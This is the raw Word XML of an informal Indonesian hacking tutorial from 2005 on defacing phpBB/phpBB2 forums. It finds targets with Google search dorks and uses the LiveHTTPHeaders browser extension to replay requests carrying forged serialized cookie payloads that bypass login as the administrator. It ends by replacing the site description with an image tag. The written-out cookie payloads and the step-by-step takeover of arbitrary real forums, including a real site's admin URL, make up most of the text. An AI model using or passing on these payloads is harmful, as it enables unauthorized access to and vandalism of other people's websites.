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>#HDTEAM Deface PHPBB/PHPBB2 dengan menggunakan LiveHTTPHeader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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Yang dibutuhkan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Browser mozilla / firefox 1.0.3 (new version)  atau versi yg dibawahnya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LiveHTTPHeader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 xml:space="preserve"> version 0.10</w:t>
        </w:r>
      </w:hyperlink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(new version) atau dibawahnya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>Cara Install LiveHTTPHeader pada Browser Firefox sbb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Install dulu Browser Firefox setelah it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Browsing menggunakan Firefox yang sudah terinstall  ke URL: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http://livehttpheaders.mozdev.org/installation.html</w:t>
        </w:r>
      </w:hyperlink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liat gbr berikut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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6835140" cy="512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Klik Install Now …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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6835140" cy="512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Setelah proses Install selesai .. Close (X) windows Extensions .. trus Close (X) Browser Firefox ny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Buka kembali browser Firefoxnya dan lihat di Toolnya FireFox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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6842760" cy="353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ip .. sampe disini Kita udah menginstall LiveHTTPHeader pada Browser Firefox kita …dan selanjutnya mulai kita deface PHPBB/PHPBB2 … (terompet perang dibunyikan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Deface PHPBB/PHPBB2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* Googling dengan Keyword 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allinurl:phpbb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atau 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allinurl:phpbb2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site:org atau  tau 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allinurl:phpbb2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site:nl   atau yg lainnya terserah kreasi loe2x pada deh.. khan dah pada mahir googling.. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Wingdings" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="360" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings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Wingdings" w:hAnsi="Wingdings"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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Persiapkan  Jampe2xnya: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Jampe2x pertama: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a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}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Jampe2x kedua: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%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D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Kalo udah dapet target, misalnya seperti ini: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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5372100" cy="302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rus buka LiveHTTPHeadernya  di Tool Firefox seperti ini,  klik tuh LiveHttpHeadernya.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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5372100" cy="273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Setelah di klik akan muncul windows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 xml:space="preserve">Live HTTP Headers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(masih kosong) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Wingdings" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>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mesti kosong ingat!!! Kayak gambar dibawah ini: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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7193280" cy="539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Klik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 xml:space="preserve">Reload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pada Firefoxnya …. LiveHttpHeadernya jangan ditutup yah.. perhatikan pada LiveHttpHeadernya dia akan terisi oleh data Heading dari URL target … spt gbr dibawah ini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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7193280" cy="5394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lu klik didalam windows LiveHttpHeaders dilanjutkan dengan klik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Replay </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">pada windows LiveHttpHeader juga, sehingga nanti muncul windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Live Http Reply, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Seperti gbr dibawah ini:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7193280" cy="5394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h kita bias liat data cookiesnya  sama session id nya, langkah berikutnya menghilangkan session IDnya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Dengan cara delete aja dari windows Live Http Reply nya </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Kita hilangkan menjadi :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Lihat gambar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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="5389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alu klik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Replay</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> lagi pada  Live Http Replay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ketika meng-klik replay maka di halaman target agar kembali ter-Refresh secara otomatis … biarin aja sampe halaman target (halaman utama) teresfresh penuh (done) okeh cooy…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Selanjutnya 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Masukan jampe2x pertama ke windows Live Http Replay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Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D  dirubah menjadi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Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}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Lihat gambar berikut:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:right="0" w:firstLine="360"/>
        <w:jc w:val="center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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5829300" cy="434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Lalu klik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Replay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lagi … perhatikan di Halaman target (halaman utama) akan kembali terefresh secara otomatis… biarkan sampai done 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Masukan Jampe2x yg kedua yaitu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%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D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ebelumnya :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Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}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Menjadi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bidi="ar-SA"/>
        </w:rPr>
        <w:t>Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D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bidi="ar-SA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Pada gambar terlihat sebagai berikut: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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6743700" cy="411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lu Klik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Replay</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Lagiiii coyyy </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Lalu …..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="Copyright"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Lihat di Halaman utama akan terifresh secara otomatis lageee ,,, dan kalau loe beruntung maka loe udah login sebagai administrator …. :D  liat di halaman target atas  kalo ada tulisan logout(nama-adminnya) atau paling bawah kalo ada tulisan </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Go to Administration Panel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Copyright"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Copyright"/>
        </w:rPr>
        <w:t>artinya loe udah sukses sevagai adminya .. selanjutnya loe klik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Copyright"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Go to Administration Panel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Copyright"/>
        </w:rPr>
        <w:t>Seperti gbr dibawah ini:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Copyright"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7193280" cy="5394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pyright"/>
        </w:rPr>
        <w:t>Trus isi admin forumnya tuh kayak gini biasanya :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Copyright"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7193280" cy="5394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suk aja ke  Configur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/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7193280" cy="5394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Ganti Site Description nya pake misalnya :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;img src="</w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          </w:rPr>
          <w:t>http://www.geocities.com/achonk_cool/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">radiation2.jpg"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Jadi gini nih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/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7193280" cy="5394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rus klik SUBMIT  paling bawah tuh</w:t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Trus liat hasilnya di sini : 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pyright">
    <w:name w:val="copyright"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Regularbody1">
    <w:name w:val="regularbody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httpheaders.mozdev.org/installation.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://livehttpheaders.mozdev.org/installation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straylight-run.com/forums/admin/index.php?sid=7b747c2163688bade40ce0c07a88aaf8" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://straylight-run.com/forums/admin/index.php?sid=7b747c2163688bade40ce0c07a88aaf8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yperlink" Target="http://www.geocities.com/achonk_cool/" TargetMode="External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07:00Z</dcterms:created>
  <dc:creator>asyrafnet</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>asyrafnet</cp:lastModifiedBy>
  <cp:lastPrinted>2113-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2005-05-06T08:52:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title>Deface PHPBB/PHPBB2 dengan menggunakan LiveHTTPHeader</dc:title>
</cp:coreProperties>
</file>